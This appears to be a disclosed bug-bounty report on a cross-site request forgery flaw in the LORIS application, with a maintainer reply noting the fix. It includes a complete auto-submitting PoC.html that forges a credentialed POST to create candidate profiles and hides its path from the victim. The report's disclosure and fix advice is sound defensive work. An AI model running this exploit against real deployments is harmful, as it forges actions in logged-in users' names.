Cross-Site Request Forgery (CSRF) in aces/loris
Reported on
Aug 17th 2021
✍️ Description
An attacker can create a new Candidate Profile through a CSRF attack.
It does not matter whether the application runs on localhost or elsewhere; it only has to be reachable from the victim's browser, and the attacker (or any low-privilege user) has to know the IP address or hostname of the application.
For a CSRF attack the victim must be logged in to the application and then visit a malicious website; from there a single auto-submitted request (or redirect) is enough to create a new Candidate Profile, i.e. merely visiting the attacker's page creates the profile.
🕵️♂️ Proof of Concept
1. First, an admin must already be logged in, in Firefox or Safari (at the time of the report these browsers still attached a cookie that has no SameSite attribute to cross-site POSTs; Chrome 80+ treats such a cookie as SameSite=Lax and would not send it with the PoC's request).
2. Open PoC.html (it auto-submits).
3. A new candidate profile with DOB 1994-08-02 is created as soon as PoC.html is opened.
// PoC.html
<html>
<body>
<!-- Rewrite the address bar to "/" so the PoC path is not visible to the victim -->
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/demo.loris.ca\/new_profile\/", true);
// Accept, Accept-Language and a multipart/form-data Content-Type are all
// CORS-safelisted, so the browser sends this cross-site POST without a
// preflight; the attacker cannot read the response, but the profile is created.
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------2198388143166471250466513195");
// Attach the victim's LORIS session cookie to the request; this is exactly
// what a SameSite=Strict attribute on that cookie would prevent.
xhr.withCredentials = true;
var body = "-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"dobDate\"\r\n" +
"\r\n" +
"1994-08-02\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"dobDateConfirm\"\r\n" +
"\r\n" +
"1994-08-02\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"edcDate\"\r\n" +
"\r\n" +
"2021-08-12\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"edcDateConfirm\"\r\n" +
"\r\n" +
"2021-08-12\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"sex\"\r\n" +
"\r\n" +
"male\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"site\"\r\n" +
"\r\n" +
"2\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"project\"\r\n" +
"\r\n" +
"3\r\n" +
"-----------------------------2198388143166471250466513195\r\n" +
"Content-Disposition: form-data; name=\"fire_away\"\r\n" +
"\r\n" +
"New Candidate\r\n" +
"-----------------------------2198388143166471250466513195--\r\n";
// Copy the string into a byte array and send it as a Blob, so the browser
// transmits the hand-built multipart body verbatim without re-encoding it
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
💥 Impact
This vulnerability allows an attacker to create a new Candidate Profile in the name of any logged-in user who visits the attacker's page.
Fix
The easiest mitigation is to set the SameSite=Strict attribute on each cookie (the session cookie in particular), so the browser does not attach it to requests initiated from another site.
The best fix is to require a CSRF token on each state-changing endpoint, checked server-side against the user's session; that does not depend on the browser's SameSite support and can be combined with the cookie attribute.
Occurrences
Thank you for reporting this.
After investigating, there was a bug with how the SameSite=strict attribute was being set on the session cookie which is now fixed by https://github.com/aces/Loris/pull/7539
I think I already did, but let me know if I missed any.
Yeah, I see them :) I hope you have good and safe programming days. Best regards, Amammad.